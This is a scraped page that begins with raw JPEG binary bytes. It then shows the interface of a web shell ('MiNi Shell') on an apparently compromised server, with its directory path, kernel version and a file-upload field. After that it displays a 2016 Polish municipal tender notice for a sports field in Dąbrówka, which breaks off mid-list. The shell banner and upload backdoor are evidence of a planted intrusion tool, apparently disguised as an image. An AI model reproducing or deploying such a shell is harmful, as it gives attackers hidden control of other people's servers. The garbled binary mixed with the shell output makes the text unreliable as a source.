JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160223/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160223/39576-N-2016.html

<p class="kh_header"><b>Sławno: Budowa  ogólnodostępnego boiska sportowego w miejscowości DĄBRÓWKA</b><br>
<b>Numer ogłoszenia: 39576 - 2016; data zamieszczenia: 23.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sławno , ul. Marszałka Józefa Piłsudskiego 31, 26-332 Sławno, woj. łódzkie, tel. 44 755-18-50, faks 44 755-18-51.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugslawno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa  ogólnodostępnego boiska sportowego w miejscowości DĄBRÓWKA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest Budowa  ogólnodostępnego boiska sportowego 
    w miejscowości DĄBRÓWKA 
2. Realizacja zadania w jednym etapie.
3. Zakres  realizacji zadania:
3.1. Obiekt sportowy zlokalizowany jest na działce  nr 716)2 w miejscowości Dąbrówka gm. Sławno.
1)	Wymiary boiska - 15x30 m -450m2
2)	Kostka brukowa -112 m2
3.2. Wyposażenie : 
1)	 boisko do piłki siatkowej
2)	 boisko do tenisa
3)	 boisko do piłki ręcznej
4)	 trybuny sportowe na 25 miejsc siedzących szt.1
   3.3. Zakres prac:  
1) Budowa ogólnodostępnego boiska sportowego   będzie polegała  na wykonaniu tyczenia pod 
     boisko sportowe - roboty pomiarowe.
2) Roboty ziemne polegające na wykonaniu koryta pod boisko sportowe.
3) Wykonanie podsypki piaskowej gr. 15 cm (Materiał Inwestora).
4) Wykonanie podbudowy z kruszywa łamanego  frakcji 0-63mm do 0-31,5mm grubość warstwy 
     po zagęszczeniu 15cm. Wykonanie robót za pomocą rozkładarki ze względu na dokładność 
     ułożenia warstwy.
5) Inwestor może mieć  możliwość zbadania zagęszczenia podłoża  lekką płytą dynamicznąjeżeli 
     będą wskazywały  na to uchybienia przy wykonaniu robót budowlanych.
3.4. Boisko sportowe
1) Wykonanie nawierzchni wyrównawczej ET o gr. 3,5 cm składającej się z granulatu SBR oraz żwiru 
      połączonego lepiszczem poliuretanowym. Wykonanie nawierzchni wyrównawczej na całej 
      powierzchni boiska tj. 15x30= 450 m2.
2)  Wykonanie nawierzchni poliuretanowej warstwa I  (dolna) gr. min 10 mm złożonej z polimerycznie
      związanego granulatu gumowego SBR 1-4mm ułożonej na uprzednio zagruntowanym podłożu
     na całej powierzchni boiska sportowego tj. 15x30= 450 m2.
3) Wykonanie nawierzchni poliuretanowej warstwa II ( (wykończeniowa) o gr. 3-4mm będąca
     mieszaniną granulatu EPDM i kleju poliuretanowego. Wykonanie nawierzchni wykończeniowej  
     o gr. 3-4mm wykonana na całej powierzchni boiska tj.  15x30= 450 m2.
4) Wykonanie malowania linii segregacyjnych boiska sportowego wykonane natryskowo , szerokość
    linii ok. 5cm w kolorze ustalonym z Inwestorem;
5) Wykonanie linii segregacyjnych do boiska:
   - boisko do piłki siatkowej
    - boisko do piłki ręcznej
     - boisko do tenisa
6) Wykonanie tulei wraz z montażem osprzętu sportowego : do piłki siatkowej z regulacją wysokości  
     oraz piłki ręcznej.
7) Kolor warstwy wykończeniowej do wyboru przez Inwestora.
8) Linie segregacyjne boiska o szerokości 5cm (dla każdego boiska inny kolor linii do ustalenia
      Inwestorem).

3.5. Trybuny sportowe 
Trybuny sportowe zewnętrzne z siedziskami polipropylenowymi konstrukcja stalowa ocynkowana ilość  miejsc siedzących 25 wymiary trybuny ok. 2m szerokości , długość dopasowana do ilości miejsc siedzących.

3.6. Wyszczególnienie zakresu rzeczowego

Lp.	Wyszczególnienie zakresu rzeczowego
1.	Roboty ziemne
2.	Nawierzchnia
3.	Kostka brukowa
4.	Wyposażenie trwale związane z obiektem

4.Szczegółowy zakres robót opisany został w opisach  technicznych, specyfikacji technicznej 
   wykonania i odbioru robót budowlanych.

5. Wykonawca zobowiązuje się do wykonania przedmiotu umowy zgodnie z opisem technicznym ,  specyfikacją technicznego wykonania i odbioru robót budowlanych, zasadami wiedzy 
technicznej i sztuki budowlanej, obowiązującymi przepisami i polskimi normami. 
6.  WYKONAWCA ZOBOWIĄZANY JEST  W RAMACH  W)W  ROBÓT  DO:

1)	Wykonania   przedmiotu   zamówienia   zgodnie  z  opisem technicznym, technologią wskazaną przez Zamawiającego oraz obowiązującymi przepisami, w szczególności z zapisami zawartymi
w Specyfikacjach Technicznych Wykonania i Odbioru Robót, załączonymi do niniejszej specyfikacji.

2)	Zabezpieczenia składowanych tymczasowo na placu  budowy materiałów i urządzeń do czasu 
ich wbudowania przed zniszczeniem lub utratą jakości, właściwości lub parametrów.

3)	Zorganizowania zaplecza budowy, podłączenia mediów we własnym zakresie i na swój koszt oraz pokrycia kosztów ich eksploatacji przez cały okres trwania budowy.

4)	Zabezpieczenia terenu robót na czas ich wykonywania przed osobami postronnymi, 
a w szczególności do przeciwdziałania wypadkom z udziałem osób trzecich. Wykonawca ponosi pełną odpowiedzialność za wszelkie szkody wyrządzone osobom  trzecim w wyniku prowadzonych prac, 
od dnia przekazania placu budowy do dnia odbioru robót. 

5)	Natychmiastowego usunięcia w sposób docelowy wszelkich szkód i awarii spowodowanych przez Wykonawcę w trakcie realizacji robót.

6)	Pokrycia kosztów związanych z bieżącą obsługą geodezyjną inwestycji, w tym odtworzenia na swój koszt  znaków osnowy geodezyjnej w przypadku gdy w/w znaki znajdują się na terenie realizacji robót.

7)	Wykonawca jako wytwórca odpadów w rozumieniu ustawy o odpadach ma obowiązek
    zagospodarowania powstałych podczas realizacji zadania odpadów zgodnie z ustawą o odpadach 
    z dnia 14 grudnia 2012 o odpadach (Dz. U. z 2013 r. poz. 21), i ustawą z dnia 27 kwietnia 2001r. 
    Prawo ochrony środowiska ( Dz. U. z 2013 r. poz. 1232 ze zm.) oraz zgłoszenia 
    informacji o wytwarzanych odpadach, sposobie ich zagospodarowania do wiadomości
    Zamawiającego. Wykonawca ma obowiązek przekazania Zamawiającemu kartę przekazania 
     odpadu powstałego w wyniku  realizacji przedmiotu umowy.   W cenie oferty Wykonawca ma
    obowiązek uwzględnić odległość, koszt wywozu  i utylizacji odpadów.

8)	Prowadzenia robót rozbiórkowych, montażowych i budowlanych zgodnie z wymogami rozporządzenia Ministra Infrastruktury z dnia 6 lutego 2003 r. w sprawie bezpieczeństwa i higieny pracy podczas wykonywania robót budowlanych (Dz. U. z 2003 r. nr 47 poz. 401).

9)	 Sporządzenia i przekazania Zamawiającemu planu bezpieczeństwa i ochrony zdrowia, sporządzonego zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 23 czerwca 2003 r. w sprawie informacji   dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia
(Dz. U. z 2003r. Nr 120, poz. 1126). Przekazanie planu BiOZ winno nastąpić w ciągu 14 dni od daty przekazania placu budowy.

10)	 Wykonania inwentaryzacji geodezyjnej powykonawczej. 

11)	Przekazania Zamawiającemu dokumentacji powykonawczej po sprawdzeniu jej kompletności przez Inspektora  Nadzoru, najpóźniej w terminie do dnia podpisania protokołu odbioru końcowego. Wykonawca zobowiązany jest do sporządzenia i przekazania kompleksowej geodezyjnej inwentaryzacji powykonawczej przyjętej do zasobów przez Powiatowy Ośrodek Geodezji (w 3 egzemplarzach) najpóźniej  do dnia podpisania protokołu odbioru końcowego.

12)	Materiały, urządzenia i wyposażenie użyte do wykonania przedmiotu zamówienia muszą być dopuszczone do stosowania na terenie RP oraz spełniać warunki określone w ustawie 
z dnia 16 kwietnia 2004 r. o wyrobach budowlanych (Dz. U. z 2014 r. poz. 883 ze zm.) 
oraz m.in. w Rozporządzeniu Ministra Infrastruktury w sprawie sposobów deklarowania zgodności   wyrobów   budowlanych   oraz   sposobu   znakowania   ich   znakiem budowlanym z 11 sierpnia 2004 r. ( Dz. U. z 2004 r., Nr 198, poz. 2041 ze zm. ). 

13)	Wszystkie nazwy  własne urządzeń i materiałów użyte w opisie przedmiotu zamówienia 
( siwz, przedmiary, stwiorb, dokumentacji projektowej  itp ),  określają  minimalne oczekiwane parametry jakościowe, techniczne oraz wymagany standard, należy je traktować jako propozycje projektanta co oznacza, że zamawiający dopuszcza złożenie oferty w tej części przedmiotu zamówienia  o równoważnych parametrach technicznych, eksploatacyjnych i użytkowych.


14)	Dopuszcza się stosowanie materiałów i urządzeń równoważnych, jednak ich parametry techniczne muszą odpowiadać  zaproponowanym w dokumentacji projektowej.

15) Obowiązek udowodnienia równoważności ciąży na Wykonawcy zgodnie z art. 30 ust 5 ustawy Prawo 
        zamówień publicznych.  

16) Wykonawca przedłoży Zamawiającemu dokumenty potwierdzające, iż wszystkie wyroby budowlane użyte do wykonania zamówienia nadają się do stosowania przy wykonywaniu robót budowlanych.

17)   Wykonawca ma obowiązek posiadać w stosunku do użytych materiałów i urządzeń dokumenty 
          potwierdzające pozwolenie na zastosowanie/wbudowanie (atesty, certyfikaty, aprobaty 
         techniczne, świadectwa jakości itp.). 

18) Wykonawca  przygotuje oraz złoży w formie spiętej wszelkie dokumenty za wykonany 
         przedmiot zamówienia, a zwłaszcza : 

a) 	dokumenty gwarancyjne wraz z warunkami gwarancji wszystkich zamontowanych urządzeń, 
b)  protokoły z badania materiałów i urządzeń, 
c)  dokumenty potwierdzające jakość materiałów i urządzeń użytych do wykonania przedmiotu  
   zamówienia, 
d) inne dokumenty zgromadzone w trakcie wykonywania przedmiotu zamówienia,  a odnoszące 
    się do jego realizacji, zwłaszcza rysunki z naniesionymi zmianami w trakcie  realizacji zadania.,
e) inwentaryzację geodezyjną  powykonawczą 
f) kosztorysy powykonawcze

19) Wykonanie robót będzie się uważać za zakończone - odbiór ostateczny, jeżeli odbiór 
         nastąpi bez usterek i Zamawiający uzyska decyzję pozwolenia na użytkowanie.
Uwaga!
Zaleca się, aby Wykonawca dokonał wizji lokalnej w terenie, gdzie mają być wykonywane roboty oraz uzyskał wszelkie niezbędne informacje, w celu dokonania oceny dokumentów i informacji przekazywanych w ramach niniejszego postępowania przez zamawiającego które mogą być konieczne do przygotowania oferty oraz zdobył na swoją własną odpowiedzialność i ryzyko, wszelkie dodatkowe informacje, które mogą być konieczne do przygotowania oferty.
Wyklucza się możliwość roszczeń Wykonawcy związanych z błędnym skalkulowaniem ceny lub pominięciem elementów niezbędnych do prawidłowego wykonania umowy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.61.10-4, 45.21.22.21-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna warunek za spełniony wówczas, gdy Wykonawca złoży oświadczenie 
z art. 22 ust. 1 ustawy  z dnia 29 stycznia 2004 r. Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna warunek za spełniony wówczas, gdy Wykonawca złoży oświadczenie 
z art. 22 ust. 1 ustawy  z dnia 29 stycznia 2004 r. Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna warunek za spełniony wówczas, gdy Wykonawca złoży oświadczenie 
z art. 22 ust. 1 ustawy  z dnia 29 stycznia 2004 r. Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>b) Potencjał kadrowy

 o zamówienie mogą ubiegać się wykonawcy, którzy dysponują lub będą dysponować  następującymi osobami,  które po stronie Wykonawcy będą kierować wykonaniem  zamówienia, mającymi doświadczenie zawodowe, minimum 5 lat i posiadającymi  n/w uprawnienia do wykonywania  samodzielnych funkcji  technicznych    w  budownictwie:

1)	Kierownika budowy - 1 osoba posiadająca: 

      a) uprawnienia budowlane do kierowania robotami budowlanymi w   specjalności 
         konstrukcyjno - budowlanej 

Wyżej wymieniona  osoba powinna legitymować się uprawnieniami budowlanymi do kierowania robotami budowlanymi wymaganymi przepisami ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U. z 2013 r. poz. 1409 ze zm. )( lub odpowiadające im równoważne uprawnienia budowlane 
do kierowania robotami we właściwej branży i zakresie, które zostały  wydane na podstawie  wcześniej obowiązujących przepisów tj. przed 01.01.1995 r.  ) oraz zgodnie z Rozporządzeniem Ministra Infrastruktury i Rozwoju  z dnia 11 września 2014  r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U.  poz. 1278). 
      Dla  wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej  określone Obwieszczeniem Ministra Infrastruktury z dnia 16 lutego 2009 r. w sprawie wykazu dyplomów i innych dokumentów, wydawanych przez inne niż Rzeczpospolita Polska państwa członkowskie Unii Europejskiej, Konfederację Szwajcarską, państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA) - strony umowy o Europejskim Obszarze Gospodarczym, potwierdzających posiadanie kwalifikacji do wykonywania zawodu architekta oraz terminów, 
w których odbywało się kształcenie.  Powyższe  zagadnienie reguluje  Ustawa z dnia
22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej  (Dz. U. z 2016 r. poz. 65).

Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.        
Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że łącznie spełniają w/w warunek.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna warunek za spełniony wówczas, gdy Wykonawca złoży oświadczenie 
z art. 22 ust. 1 ustawy  z dnia 29 stycznia 2004 r. Prawo zamówień publicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony i podpisany  formularz ofertowy sporządzony zgodnie z treścią i formą zawartą 
we wzorze (wg załączonego wzoru Nr 1 ) 
2.	Harmonogram - zestawienie rzeczowo - finansowe operacji (wg załączonego wzoru Nr 2, 
do  celów poglądowych
3.  Dokument pełnomocnictwa - ( oryginał lub notarialnie poświadczona kopia ) do podpisania 
       oferty, jeżeli oferta nie została podpisana przez osoby upoważnione do tych czynności 
       dokumentem rejestracyjnym, również w przypadku złożenia  oferty przez wykonawców 
       ubiegających się o zamówienie wspólnie ( np. konsorcjum, sp. cywilna ), pełnomocnictwo 
       powinno   jednoznacznie   określać zakres umocowania  i wskazywać osobę pełnomocnika.
4.     Kosztorys ofertowy  w wersji uproszczonej  służący do celów poglądowych ( nie podlega ocenie)

- oświadczenie wykonawcy w zakresie obowiązku podatkowego  załącznik Nr 9  do siwz,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>7. W szczególności Zamawiający ustanawia następujące warunki umożliwiające zmianę treści umowy:
1)zmiany wysokości podatku VAT, jeżeli w okresie obowiązywania umowy nastąpi zmiana przepisów 
    podatkowych,
2)zmiany lub rezygnacji z podwykonawcy dotyczącej podmiotu, na którego zasoby Wykonawca 
     powoływał się na zasadach określonych w art.26 ust.2b, w celu wykazania spełniania warunków 
     udziału w postępowaniu, o których mowa w art. 22 ust.1, Wykonawca jest obowiązany wykazać,
     iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia warunki w stopniu nie
     mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia publicznego, 
3)zmiany podwykonawców lub zakresu robót wykonywanych przez podwykonawców zgłoszonych 
   przez Wykonawców według postanowień umowy,
4)jeżeli konieczność zmiany terminu realizacji umowy wynikła z okoliczności niezawinionych przez 
    Wykonawcę, a w szczególności została wymuszona oczekiwaniem na uzgodnienia lub wydanie 
    decyzji przez jakikolwiek właściwy organ (działanie lub bezczynność organów),
5)konieczności zrealizowania przedmiotu zamówienia przy zastosowaniu innych rozwiązań 
   technicznych/technologicznych niż wskazane w dokumentacji projektowej lub specyfikacji 
   technicznej wykonania i odbioru robót, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań
   groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy, 
6)wykonania robót zamiennych z przyczyn o charakterze technologicznym w stosunku 
   do przewidzianych w dokumentacji projektowej, gdy wykonanie tych robót będzie niezbędne
   do prawidłowego wykonania umowy i nie spowoduje rozszerzenia przedmiotu zamówienia 
   w stosunku do przedmiotu określonego w specyfikacji istotnych warunków zamówienia oraz
    wynikającego z treści oferty,
 7)nadzwyczajnych warunków nieprzewidzianych w SIWZ jak: niewypały i niewybuchy; wykopaliska
    archeologiczne; inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy 
    skutkujących niemożliwością prowadzenia prac lub wykonywania innych czynności przewidzianych 
    umową,
 8)zaistnienia po stronie Zamawiającego konieczności usunięcia istotnych błędów lub wprowadzenia 
     istotnych zmian w dokumentacji projektowej lub w specyfikacjach technicznych wykonania 
     i odbioru robót budowlanych - nieujawnionych przed wszczęciem postępowania o udzielenie 
    zamówienia publicznego, 
9) zmiany osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne spełniające
     warunki określone w specyfikacji istotnych warunków zamówienia, 
10) gdy wystąpią zmiany, których konieczność wprowadzenia będzie wynikała z wymagań instytucji 
      współfinansujących realizację przedmiotu zamówienia,
11)  zmiany i modyfikacje w harmonogramie rzeczowo-finansowym na wniosek Zamawiającego,
          lub w okolicznościach, za które Wykonawca nie ponosi żadnej odpowiedzialności - na jego 
           wniosek, 
12) w przypadku wystąpienia okoliczności wstrzymania prowadzonej inwestycji przez czynniki 
        zewnętrzne (np. inne niezależne budowy),
13) wystąpienie konieczności wykonania robót dodatkowych, od których zależy wykonanie 
         przedmiotu   zamówienia;
14) odkrycie przeszkód, instalacji i urządzeń na terenie budowy, których  nie naniesiono  
        na dokumentację geodezyjną, geologiczną lub projektową i których wystąpienie powoduje 
        konieczność zmiany sposobu wykonania robót;
15) powzięcie informacji o nowych rozwiązaniach  technicznych, technologicznych i jakościowych, 
        których zastosowanie okaże się korzystne dla zamawiającego, a nie spowoduje rozszerzenia 
